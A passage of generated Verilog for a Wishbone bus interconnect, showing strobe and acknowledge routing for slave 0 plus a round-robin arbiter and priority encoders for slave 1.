    always @ (  ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) ) or  ( ( ( m0_slv_sel == 4'd0 ) ) ? ( m0_stb_i ) : ( 1'b0 ) ) or  ( ( ( m1_slv_sel == 4'd0 ) ) ? ( m1_stb_i ) : ( 1'b0 ) ) or  ( ( ( m2_slv_sel == 4'd0 ) ) ? ( m2_stb_i ) : ( 1'b0 ) ) or  ( ( ( m3_slv_sel == 4'd0 ) ) ? ( m3_stb_i ) : ( 1'b0 ) ) or  ( ( ( m4_slv_sel == 4'd0 ) ) ? ( m4_stb_i ) : ( 1'b0 ) ) or  ( ( ( m5_slv_sel == 4'd0 ) ) ? ( m5_stb_i ) : ( 1'b0 ) ) or  ( ( ( m6_slv_sel == 4'd0 ) ) ? ( m6_stb_i ) : ( 1'b0 ) ) or  ( ( ( m7_slv_sel == 4'd0 ) ) ? ( m7_stb_i ) : ( 1'b0 ) ))
    begin
        case ( ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s0_wb_stb_o = ( ( ( m0_slv_sel == 4'd0 ) ) ? ( m0_stb_i ) : ( 1'b0 ) );
        end
        3'd1:
        begin
            s0_wb_stb_o = ( ( ( m1_slv_sel == 4'd0 ) ) ? ( m1_stb_i ) : ( 1'b0 ) );
        end
        3'd2:
        begin
            s0_wb_stb_o = ( ( ( m2_slv_sel == 4'd0 ) ) ? ( m2_stb_i ) : ( 1'b0 ) );
        end
        3'd3:
        begin
            s0_wb_stb_o = ( ( ( m3_slv_sel == 4'd0 ) ) ? ( m3_stb_i ) : ( 1'b0 ) );
        end
        3'd4:
        begin
            s0_wb_stb_o = ( ( ( m4_slv_sel == 4'd0 ) ) ? ( m4_stb_i ) : ( 1'b0 ) );
        end
        3'd5:
        begin
            s0_wb_stb_o = ( ( ( m5_slv_sel == 4'd0 ) ) ? ( m5_stb_i ) : ( 1'b0 ) );
        end
        3'd6:
        begin
            s0_wb_stb_o = ( ( ( m6_slv_sel == 4'd0 ) ) ? ( m6_stb_i ) : ( 1'b0 ) );
        end
        3'd7:
        begin
            s0_wb_stb_o = ( ( ( m7_slv_sel == 4'd0 ) ) ? ( m7_stb_i ) : ( 1'b0 ) );
        end
        endcase
    end
    assign s0_m0_ack_o = ( ( ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s0_ack_i );
    assign s0_m1_ack_o = ( ( ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s0_ack_i );
    assign s0_m2_ack_o = ( ( ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s0_ack_i );
    assign s0_m3_ack_o = ( ( ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s0_ack_i );
    assign s0_m4_ack_o = ( ( ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s0_ack_i );
    assign s0_m5_ack_o = ( ( ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s0_ack_i );
    assign s0_m6_ack_o = ( ( ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s0_ack_i );
    assign s0_m7_ack_o = ( ( ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s0_ack_i );
    assign s0_m0_err_o = ( ( ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s0_err_i );
    assign s0_m1_err_o = ( ( ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s0_err_i );
    assign s0_m2_err_o = ( ( ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s0_err_i );
    assign s0_m3_err_o = ( ( ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s0_err_i );
    assign s0_m4_err_o = ( ( ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s0_err_i );
    assign s0_m5_err_o = ( ( ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s0_err_i );
    assign s0_m6_err_o = ( ( ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s0_err_i );
    assign s0_m7_err_o = ( ( ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s0_err_i );
    assign s0_m0_rty_o = ( ( ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s0_rty_i );
    assign s0_m1_rty_o = ( ( ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s0_rty_i );
    assign s0_m2_rty_o = ( ( ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s0_rty_i );
    assign s0_m3_rty_o = ( ( ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s0_rty_i );
    assign s0_m4_rty_o = ( ( ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s0_rty_i );
    assign s0_m5_rty_o = ( ( ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s0_rty_i );
    assign s0_m6_rty_o = ( ( ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s0_rty_i );
    assign s0_m7_rty_o = ( ( ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s0_rty_i );
    assign s1_wb_data_i = s1_data_i;
    assign s1_data_o = s1_wb_data_o;
    assign s1_addr_o = s1_wb_addr_o;
    assign s1_sel_o = s1_wb_sel_o;
    assign s1_we_o = s1_wb_we_o;
    assign s1_cyc_o = s1_wb_cyc_o;
    assign s1_stb_o = s1_wb_stb_o;
    assign s1_wb_ack_i = s1_ack_i;
    assign s1_wb_err_i = s1_err_i;
    assign s1_wb_rty_i = s1_rty_i;
    always @ (  posedge clk_i)
    begin
        s1_next <=  ~( s1_wb_cyc_o);
    end
    assign s1_arb_req = { m7_s1_cyc_o, m6_s1_cyc_o, m5_s1_cyc_o, m4_s1_cyc_o, m3_s1_cyc_o, m2_s1_cyc_o, m1_s1_cyc_o, m0_s1_cyc_o };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s1_arb_state <= s1_arb_grant0;
        end
        else
        begin 
            s1_arb_state <= s1_arb_next_state;
        end
    end
    always @ (  s1_arb_state or  { m7_s1_cyc_o, m6_s1_cyc_o, m5_s1_cyc_o, m4_s1_cyc_o, m3_s1_cyc_o, m2_s1_cyc_o, m1_s1_cyc_o, m0_s1_cyc_o } or  1'b0)
    begin
        s1_arb_next_state = s1_arb_state;
        case ( s1_arb_state ) 
        s1_arb_grant0:
        begin
            if (  !( s1_arb_req[0]) | 1'b0 ) 
            begin
                if ( s1_arb_req[1] ) 
                begin
                    s1_arb_next_state = s1_arb_grant1;
                end
                else
                begin 
                    if ( s1_arb_req[2] ) 
                    begin
                        s1_arb_next_state = s1_arb_grant2;
                    end
                    else
                    begin 
                        if ( s1_arb_req[3] ) 
                        begin
                            s1_arb_next_state = s1_arb_grant3;
                        end
                        else
                        begin 
                            if ( s1_arb_req[4] ) 
                            begin
                                s1_arb_next_state = s1_arb_grant4;
                            end
                            else
                            begin 
                                if ( s1_arb_req[5] ) 
                                begin
                                    s1_arb_next_state = s1_arb_grant5;
                                end
                                else
                                begin 
                                    if ( s1_arb_req[6] ) 
                                    begin
                                        s1_arb_next_state = s1_arb_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s1_arb_req[7] ) 
                                        begin
                                            s1_arb_next_state = s1_arb_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s1_arb_grant1:
        begin
            if (  !( s1_arb_req[1]) | 1'b0 ) 
            begin
                if ( s1_arb_req[2] ) 
                begin
                    s1_arb_next_state = s1_arb_grant2;
                end
                else
                begin 
                    if ( s1_arb_req[3] ) 
                    begin
                        s1_arb_next_state = s1_arb_grant3;
                    end
                    else
                    begin 
                        if ( s1_arb_req[4] ) 
                        begin
                            s1_arb_next_state = s1_arb_grant4;
                        end
                        else
                        begin 
                            if ( s1_arb_req[5] ) 
                            begin
                                s1_arb_next_state = s1_arb_grant5;
                            end
                            else
                            begin 
                                if ( s1_arb_req[6] ) 
                                begin
                                    s1_arb_next_state = s1_arb_grant6;
                                end
                                else
                                begin 
                                    if ( s1_arb_req[7] ) 
                                    begin
                                        s1_arb_next_state = s1_arb_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s1_arb_req[0] ) 
                                        begin
                                            s1_arb_next_state = s1_arb_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s1_arb_grant2:
        begin
            if (  !( s1_arb_req[2]) | 1'b0 ) 
            begin
                if ( s1_arb_req[3] ) 
                begin
                    s1_arb_next_state = s1_arb_grant3;
                end
                else
                begin 
                    if ( s1_arb_req[4] ) 
                    begin
                        s1_arb_next_state = s1_arb_grant4;
                    end
                    else
                    begin 
                        if ( s1_arb_req[5] ) 
                        begin
                            s1_arb_next_state = s1_arb_grant5;
                        end
                        else
                        begin 
                            if ( s1_arb_req[6] ) 
                            begin
                                s1_arb_next_state = s1_arb_grant6;
                            end
                            else
                            begin 
                                if ( s1_arb_req[7] ) 
                                begin
                                    s1_arb_next_state = s1_arb_grant7;
                                end
                                else
                                begin 
                                    if ( s1_arb_req[0] ) 
                                    begin
                                        s1_arb_next_state = s1_arb_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s1_arb_req[1] ) 
                                        begin
                                            s1_arb_next_state = s1_arb_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s1_arb_grant3:
        begin
            if (  !( s1_arb_req[3]) | 1'b0 ) 
            begin
                if ( s1_arb_req[4] ) 
                begin
                    s1_arb_next_state = s1_arb_grant4;
                end
                else
                begin 
                    if ( s1_arb_req[5] ) 
                    begin
                        s1_arb_next_state = s1_arb_grant5;
                    end
                    else
                    begin 
                        if ( s1_arb_req[6] ) 
                        begin
                            s1_arb_next_state = s1_arb_grant6;
                        end
                        else
                        begin 
                            if ( s1_arb_req[7] ) 
                            begin
                                s1_arb_next_state = s1_arb_grant7;
                            end
                            else
                            begin 
                                if ( s1_arb_req[0] ) 
                                begin
                                    s1_arb_next_state = s1_arb_grant0;
                                end
                                else
                                begin 
                                    if ( s1_arb_req[1] ) 
                                    begin
                                        s1_arb_next_state = s1_arb_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s1_arb_req[2] ) 
                                        begin
                                            s1_arb_next_state = s1_arb_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s1_arb_grant4:
        begin
            if (  !( s1_arb_req[4]) | 1'b0 ) 
            begin
                if ( s1_arb_req[5] ) 
                begin
                    s1_arb_next_state = s1_arb_grant5;
                end
                else
                begin 
                    if ( s1_arb_req[6] ) 
                    begin
                        s1_arb_next_state = s1_arb_grant6;
                    end
                    else
                    begin 
                        if ( s1_arb_req[7] ) 
                        begin
                            s1_arb_next_state = s1_arb_grant7;
                        end
                        else
                        begin 
                            if ( s1_arb_req[0] ) 
                            begin
                                s1_arb_next_state = s1_arb_grant0;
                            end
                            else
                            begin 
                                if ( s1_arb_req[1] ) 
                                begin
                                    s1_arb_next_state = s1_arb_grant1;
                                end
                                else
                                begin 
                                    if ( s1_arb_req[2] ) 
                                    begin
                                        s1_arb_next_state = s1_arb_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s1_arb_req[3] ) 
                                        begin
                                            s1_arb_next_state = s1_arb_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s1_arb_grant5:
        begin
            if (  !( s1_arb_req[5]) | 1'b0 ) 
            begin
                if ( s1_arb_req[6] ) 
                begin
                    s1_arb_next_state = s1_arb_grant6;
                end
                else
                begin 
                    if ( s1_arb_req[7] ) 
                    begin
                        s1_arb_next_state = s1_arb_grant7;
                    end
                    else
                    begin 
                        if ( s1_arb_req[0] ) 
                        begin
                            s1_arb_next_state = s1_arb_grant0;
                        end
                        else
                        begin 
                            if ( s1_arb_req[1] ) 
                            begin
                                s1_arb_next_state = s1_arb_grant1;
                            end
                            else
                            begin 
                                if ( s1_arb_req[2] ) 
                                begin
                                    s1_arb_next_state = s1_arb_grant2;
                                end
                                else
                                begin 
                                    if ( s1_arb_req[3] ) 
                                    begin
                                        s1_arb_next_state = s1_arb_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s1_arb_req[4] ) 
                                        begin
                                            s1_arb_next_state = s1_arb_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s1_arb_grant6:
        begin
            if (  !( s1_arb_req[6]) | 1'b0 ) 
            begin
                if ( s1_arb_req[7] ) 
                begin
                    s1_arb_next_state = s1_arb_grant7;
                end
                else
                begin 
                    if ( s1_arb_req[0] ) 
                    begin
                        s1_arb_next_state = s1_arb_grant0;
                    end
                    else
                    begin 
                        if ( s1_arb_req[1] ) 
                        begin
                            s1_arb_next_state = s1_arb_grant1;
                        end
                        else
                        begin 
                            if ( s1_arb_req[2] ) 
                            begin
                                s1_arb_next_state = s1_arb_grant2;
                            end
                            else
                            begin 
                                if ( s1_arb_req[3] ) 
                                begin
                                    s1_arb_next_state = s1_arb_grant3;
                                end
                                else
                                begin 
                                    if ( s1_arb_req[4] ) 
                                    begin
                                        s1_arb_next_state = s1_arb_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s1_arb_req[5] ) 
                                        begin
                                            s1_arb_next_state = s1_arb_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s1_arb_grant7:
        begin
            if (  !( s1_arb_req[7]) | 1'b0 ) 
            begin
                if ( s1_arb_req[0] ) 
                begin
                    s1_arb_next_state = s1_arb_grant0;
                end
                else
                begin 
                    if ( s1_arb_req[1] ) 
                    begin
                        s1_arb_next_state = s1_arb_grant1;
                    end
                    else
                    begin 
                        if ( s1_arb_req[2] ) 
                        begin
                            s1_arb_next_state = s1_arb_grant2;
                        end
                        else
                        begin 
                            if ( s1_arb_req[3] ) 
                            begin
                                s1_arb_next_state = s1_arb_grant3;
                            end
                            else
                            begin 
                                if ( s1_arb_req[4] ) 
                                begin
                                    s1_arb_next_state = s1_arb_grant4;
                                end
                                else
                                begin 
                                    if ( s1_arb_req[5] ) 
                                    begin
                                        s1_arb_next_state = s1_arb_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s1_arb_req[6] ) 
                                        begin
                                            s1_arb_next_state = s1_arb_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s1_msel_req = { m7_s1_cyc_o, m6_s1_cyc_o, m5_s1_cyc_o, m4_s1_cyc_o, m3_s1_cyc_o, m2_s1_cyc_o, m1_s1_cyc_o, m0_s1_cyc_o };
    assign s1_msel_pri_enc_valid = { m7_s1_cyc_o, m6_s1_cyc_o, m5_s1_cyc_o, m4_s1_cyc_o, m3_s1_cyc_o, m2_s1_cyc_o, m1_s1_cyc_o, m0_s1_cyc_o };
    always @ (  s1_msel_pri_enc_valid[0] or  { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[1] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[0] ) ) })
    begin
        if (  !( s1_msel_pri_enc_valid[0]) ) 
        begin
            s1_msel_pri_enc_pd0_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[1] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[0] ) ) } == 2'h0 ) 
            begin
                s1_msel_pri_enc_pd0_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[1] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[0] ) ) } == 2'h1 ) 
                begin
                    s1_msel_pri_enc_pd0_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[1] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[0] ) ) } == 2'h2 ) 
                    begin
                        s1_msel_pri_enc_pd0_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s1_msel_pri_enc_pd0_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s1_msel_pri_enc_valid[0] or  { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[1] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[0] ) ) })
    begin
        if (  !( s1_msel_pri_enc_valid[0]) ) 
        begin
            s1_msel_pri_enc_pd0_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[1] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[0] ) ) } == 2'h0 ) 
            begin
                s1_msel_pri_enc_pd0_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s1_msel_pri_enc_pd0_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s1_msel_pri_enc_valid[1] or  { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[3] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[2] ) ) })
    begin
        if (  !( s1_msel_pri_enc_valid[1]) ) 
        begin
            s1_msel_pri_enc_pd1_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[3] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[2] ) ) } == 2'h0 ) 
            begin
                s1_msel_pri_enc_pd1_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[3] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[2] ) ) } == 2'h1 ) 
                begin
                    s1_msel_pri_enc_pd1_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[3] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[2] ) ) } == 2'h2 ) 
                    begin
                        s1_msel_pri_enc_pd1_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s1_msel_pri_enc_pd1_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s1_msel_pri_enc_valid[1] or  { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[3] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[2] ) ) })
    begin
        if (  !( s1_msel_pri_enc_valid[1]) ) 
        begin
            s1_msel_pri_enc_pd1_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[3] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[2] ) ) } == 2'h0 ) 
            begin
                s1_msel_pri_enc_pd1_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s1_msel_pri_enc_pd1_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s1_msel_pri_enc_valid[2] or  { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[5] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[4] ) ) })
    begin
        if (  !( s1_msel_pri_enc_valid[2]) ) 
        begin
            s1_msel_pri_enc_pd2_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[5] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[4] ) ) } == 2'h0 ) 
            begin
                s1_msel_pri_enc_pd2_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[5] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[4] ) ) } == 2'h1 ) 
                begin
                    s1_msel_pri_enc_pd2_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[5] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[4] ) ) } == 2'h2 ) 
                    begin
                        s1_msel_pri_enc_pd2_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s1_msel_pri_enc_pd2_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s1_msel_pri_enc_valid[2] or  { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[5] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[4] ) ) })
    begin
        if (  !( s1_msel_pri_enc_valid[2]) ) 
        begin
            s1_msel_pri_enc_pd2_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[5] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[4] ) ) } == 2'h0 ) 
            begin
                s1_msel_pri_enc_pd2_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s1_msel_pri_enc_pd2_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s1_msel_pri_enc_valid[3] or  { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[7] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[6] ) ) })
    begin
        if (  !( s1_msel_pri_enc_valid[3]) ) 
        begin
            s1_msel_pri_enc_pd3_pri_out_d1 = 4'b0001;
        end
        else
        begin 
